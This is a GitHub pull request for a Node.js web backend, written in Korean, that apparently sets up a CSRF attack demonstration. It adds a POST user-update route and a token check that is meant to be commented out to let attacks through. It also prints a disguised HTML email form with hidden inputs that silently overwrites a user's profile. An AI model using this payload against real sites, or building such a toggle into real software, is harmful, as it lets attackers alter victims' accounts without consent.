### PR TITLE
[BE]CSRFF Attack을 위한 수정

### DIFF
--- a/WEB/BE/middlewares/sessionAuthentication.js
+++ b/WEB/BE/middlewares/sessionAuthentication.js
@@ -4,10 +4,12 @@ const sessionAuthentication = {
   sessionCheck(req, res, next) {
     const { CSRF_TOKEN } = req.session;
     const { csrfToken } = req.query;
-    if (!req.session.user || CSRF_TOKEN !== csrfToken) {
+    if (!req.session.user) {
       res.clearCookie('csrfToken');
       return next(createError(401, '로그아웃되어 권한이 없습니다.'));
     }
+    // 주석처리하여 CSRF Attack 시도가능
+    if (CSRF_TOKEN !== csrfToken) return next(createError(401, '잘못된 접근입니다.'));
     res.cookie('csrfToken', csrfToken, {
       maxAge: 2 * 60 * 60 * 1000,
     });

--- a/WEB/BE/routes/web/user/index.js
+++ b/WEB/BE/routes/web/user/index.js
@@ -302,5 +302,10 @@ router.use(sessionAuthentication.sessionCheck);
  */
 router.get('/', catchErrors(userController.getUser));
 router.patch('/', validator(['name', 'email', 'phone', 'birth']), catchErrors(userController.updateUser));
+router.post(
+  '/update',
+  validator(['name', 'email', 'phone', 'birth']),
+  catchErrors(userController.updateUser)
+);
 
 module.exports = router;


### PR DESCRIPTION
## :white_check_mark: 작업 내용

- api/user/update (Method: POST) 라우터 추가
  - patch Method를 form tag로 전달할 수가 없다.........
- session authentication에서 CSRF Token 검사하는 부분을 따로 나눠줘서 '잘못된 접근입니다' 라는 메세지를 띄우게 하였습니다.
- 기존 api/user/ (Method:Patch)에 맞는 body값들을 전달하기 위한 form, hidden Input, button tag를 사용한 CSRF 이메일 템플릿 생성

## :hammer: 변경로직

```javascript
    if (CSRF_TOKEN !== csrfToken) return next(createError(401, '잘못된 접근입니다.'));
```
이부분을 주석처리하면 CSRF 공격 통과
## :camera_flash: 스크린샷 (Optional)
```HTML
<form action="http://localhost:8080/api/user/update" method="post">
  <input type="hidden" name="name" value="CSRFAttack">
  <input type="hidden" name="email" value="csrf@csrf.csrf">
  <input type="hidden" name="birth" value="1944-04-04">
  <input type="hidden" name="phone" value="444-4444-4444">
  <button type="submit" style="all: unset;cursor:pointer; color: #ffffff; font-size: 18px; background-color: #5E71DE; padding: 10px 20px; border-radius: 5px;">확인하러 가기 </button>
</form>
```
![image](https://user-images.githubusercontent.com/41230031/102649167-10627380-41ac-11eb-8b0e-09f50ab7450e.png)
누르면 hidden Input안에 적혀져있는 형식에 맞게 사용자의 정보가 수정됩니다.

- 주석처리 안했을 때 
![image](https://user-images.githubusercontent.com/41230031/102649814-38060b80-41ad-11eb-9e11-c35b873be190.png)

- 주석처리 했을 때
![image](https://user-images.githubusercontent.com/41230031/102649888-553ada00-41ad-11eb-88b9-33019ceef322.png)

## :lock: 관련 이슈(닫을 이슈)

- close #382
